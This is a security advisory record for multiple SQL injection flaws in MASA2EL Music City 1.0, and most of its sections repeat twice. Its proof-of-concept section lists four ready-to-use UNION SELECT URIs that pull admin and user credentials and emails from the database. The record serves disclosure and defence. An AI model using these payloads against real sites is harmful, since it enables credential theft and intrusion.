MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
BID:38378
Info
MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 38378 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 23 2010 12:00AM |
| Updated: | Feb 23 2010 12:00AM |
| Credit: | JIKO |
| Vulnerable: |
MASA2EL Music City 1.0 |
| Not Vulnerable: | |
Discussion
MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
MASA2EL Music City is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MASA2EL Music City 1.0 is vulnerable; other versions may also be affected.
MASA2EL Music City is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MASA2EL Music City 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
http://www.example.com/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_user--
http://www.example.com/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword,0x3a,email),2,3 from masa2el_user--
http://www.example.com/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
http://www.example.com/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_user--
http://www.example.com/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword,0x3a,email),2,3 from masa2el_user--
http://www.example.com/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
Solution / Fix
MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
MASA2EL Music City 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Music City Homepage (MASA2EL)